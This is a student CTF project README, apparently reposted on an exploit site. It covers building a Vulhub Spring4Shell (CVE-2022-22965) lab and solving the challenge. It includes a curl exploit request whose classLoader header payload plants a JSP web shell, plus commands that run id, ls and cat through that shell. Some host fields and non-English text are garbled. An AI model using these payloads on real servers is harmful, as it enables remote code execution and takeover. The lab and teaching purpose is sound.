Share
## https://sploitus.com/exploit?id=E5C51EF4-53A6-5EBC-B9C0-9FFB53D2F6F2
# Spring4Shell (CVE-2022-22965) Vulnerability Environment Setup and CTF Problem

## Project Overview

This project creates a Spring4Shell (CVE-2022-22965) vulnerability environment using Vulhub, and designs a CTF problem where participants can read flags through remote code execution vulnerabilities. ---

## Environment Setup Steps

### 1. Install Docker and Docker Compose

```bash
# Update the package repository
sudo apt update

# Install Docker and Docker Compose
sudo apt install docker.io docker-compose -y

# Start the Docker service
sudo systemctl start docker
sudo systemctl enable docker
```

### 2. Download the Vulhub vulnerability environment

```bash
# Download the Vulhub project
git clone https://github.com/vulhub/vulhub.git

# Navigate to the Spring4Shell vulnerability directory
cd vulhub/spring/CVE-2022-22965
```

### 3. Start the vulnerability environment

```bash
# Start the Docker container
sudo docker-compose up -d

# Verify that the container is running
sudo docker ps
```

![docker-ps](screenshots/docker-ps.png)

### 4. Verify the environment

Open a browser and visit `http://localhost:8080/?name=Hacker&age=99`

![parameter-binding](screenshots/parameter-binding.png)

---

## Shell.jsp File

After successful attacks, the shell file will be written to `webapps/ROOT/tomcatwar.jsp`, with the following content:

```jsp
```

### How to Use the Backdoor

Execute arbitrary system commands using the `cmd` parameter:

```bash
http://localhost:8080/tomcatwar.jsp?cmd=id
```

---

## RCE Attack Screenshots

### Executing the `id` command

```bash
curl "http://localhost:8080/tomcatwar.jsp?cmd=id"
```

![rce-id](screenshots/rce-id.png)

### Executing the `ls /` command

```bash
curl "http://localhost:8080/tomcatwar.jsp?cmd=ls%20/"
```

![rce-ls](screenshots/rce-ls.png)

---

## Description of the CTF Problem

### Problem Name
Spring4Shell Vulnerability Exploitation

### Problem Description
There is a website using the Spring MVC framework, which seems to have a remote code execution vulnerability. Can you find the flag hidden on the server?

### Location of the Flag
```
/tmp/flag.txt
```

### Content of the Flag
```
FLAG{Spring4Shell_Is_Dangerous}
```

---

## Solution Steps

### Step 1: Confirm the existence of the vulnerability

Visit `http://:8080/`

name=test&age=123โ€œ, confirming that the parameter binding function works properly. ### Step 2: Send an Attack Payload

Using the Spring4Shell vulnerability to inject into the JSP backdoor:

```bash
curl -X POST "http://:8080/?" \
  -H "suffix: %>//" \
  -H "c1: Runtime" \
  -H "c2: &class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
```

### Step 3: Use the backdoor to execute commands

Access the backdoor and execute `id` to confirm successful RCE:

```
http://:8080/tomcatwar.jsp?cmd=id
```

### Step 4: Read the flag

```bash
curl "http://:8080/tomcatwar.jsp?cmd=cat%20/tmp/flag.txt"
```

![flag-result](screenshots/flag-result.png)

### Step 5: Obtain the flag

```
FLAG{Spring4Shell_Is_Dangerous}
```

---

## Project Structure

```
Spring4Shell-CTF/
โ”œโ”€โ”€ README.md           # Project documentation
โ”œโ”€โ”€ screenshots/        # Screenshot folder
โ”‚   โ”œโ”€โ”€ docker-ps.png
โ”‚   โ”œโ”€โ”€ parameter-binding.png
โ”‚   โ”œโ”€โ”€ rce-id.png
โ”‚   โ”œโ”€โ”€ rce-ls.png
โ”‚   โ””โ”€โ”€ flag-result.png
โ””โ”€โ”€ shell.jsp           # Original backdoor code
```

---

## References

- [CVE-2022-22965 Detailed Analysis](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)
- [Vulhub Spring4Shell Environment](https://github.com/vulhub/vulhub/tree/master/spring/CVE-2022-22965)
- [Spring4Shell PoC](https://github.com/BobTheShoplifter/Spring4Shell-POC)

---

## Team Members

| Role | Name | Role |
|------|------|------|
| Member A | Huang Yuting | Environment setup, attack implementation, CTF design |
| Member B | Li Zhenlin | Theoretical research, presentation creation, video editing |

---

## Permissions

This project is intended only for educational and research purposes. Please do not use it on unauthorized systems.

[source-iocs-preserved url=http://:8080/?name=test&age=123`๏ผŒ็ขบ่ชๅƒๆ•ธ็ถๅฎšๅŠŸ่ƒฝๆญฃๅธธใ€‚]